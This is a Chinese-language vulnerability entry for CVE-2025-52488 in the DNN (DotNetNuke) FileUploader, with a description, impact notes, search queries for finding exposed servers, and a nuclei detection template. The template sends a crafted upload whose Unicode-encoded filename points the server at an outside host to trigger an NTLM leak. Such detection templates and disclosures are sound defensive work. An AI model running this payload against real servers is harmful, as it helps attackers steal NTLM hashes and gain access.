DNN FileUploader Unicode Path Normalization Vulnerability

漏洞信息

漏洞名称： DNN FileUploader Unicode Path Normalization Vulnerability

漏洞编号：

• CVE： CVE-2025-52488

漏洞类型： 信息泄露

漏洞等级： 高危

漏洞描述： DNN（原DotNetNuke）是一个开源的基于微软生态系统的Web内容管理平台（CMS）。在6.0.0至10.0.1之前的版本中，DNN.PLATFORM允许一系列特制的恶意交互，可能将NTLM哈希暴露给第三方SMB服务器。此问题已在10.0.1版本中修复。

漏洞解释：该漏洞属于信息泄露类型，其技术根源在于Unicode路径规范化处理不当，使得攻击者可以通过构造特殊的文件上传请求，诱导系统向攻击者控制的SMB服务器泄露NTLM哈希。这种漏洞利用了Windows网络特性和Unicode规范化处理的缺陷。

影响分析：此漏洞可能导致严重的NTLM哈希泄露，攻击者可以利用这些哈希进行进一步的攻击，如Pass-the-Hash攻击，从而在不需要用户密码的情况下获取系统访问权限。由于漏洞可以通过网络远程利用，且不需要用户交互，因此其潜在影响范围广泛，尤其是对于未打补丁的DNN平台部署。

产品厂商： dotnetnuke

产品名称： DNN.PLATFORM

影响版本： 6.0.0 <= version < 10.0.1

搜索语法： app=”DotNetNuke” || Set-Cookie: dnn_IsMobile || icon_hash=”-1465479343”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/6eb1fd337abc5c97525d1471eb2996d7d951bd4e/http%2Fcves%2F2025%2FCVE-2025-52488.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-52488

info:
  name: Unicode Path Normalization in DNN FileUploader - DNS Interaction
  author: DhiyaneshDk,iamnoooob,pdresearch
  severity: high
  description: |
    DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted series of malicious interaction to potentially expose NTLM hashes to a third party SMB server. This issue has been patched in version 10.0.1.
  reference:
    - https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-mgfv-2362-jq96
    - https://slcyber.io/assetnote-security-research-center/abusing-windows-net-quirks-and-unicode-normalization-to-exploit-dnn-dotnetnuke/#hunting-variants
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2025-52488
    cwe-id: CWE-200
    epss-score: 0.00031
    epss-percentile: 0.07222
  metadata:
    verified: true
    max-request: 1
    vendor: dotnetnuke
    product: dotnetnuke
    shodan-query:
      - "Set-Cookie: dnn_IsMobile"
      - http.favicon.hash:-1465479343
    fofa-query:
      - app="DotNetNuke"
      - "Set-Cookie: dnn_IsMobile"
      - icon_hash="-1465479343"
  tags: cve,cve2025,file-upload,dotnetnuke,oast,obb

variables:
  payload: "%EF%BC%BC%EF%BC%BC{{interactsh-url}}%EF%BC%BC%EF%BC%BCc$%EF%BC%BC%EF%BC%BCan.jpg"

http:
  - raw:
      - |
        POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx?PortalID=0&storageFolderID=1&overrideFiles=false HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Accept-Language: en-US;q=0.9,en;q=0.8
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXXXXXXXXXXXX

        ------WebKitFormBoundaryXXXXXXXXXXXX
        Content-Disposition: form-data; name="file"; filename="{{url_decode(replace(payload,'.','%EF%BC%8E'))}}"
        Content-Type: image/jpeg

        test
        ------WebKitFormBoundaryXXXXXXXXXXXX--

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"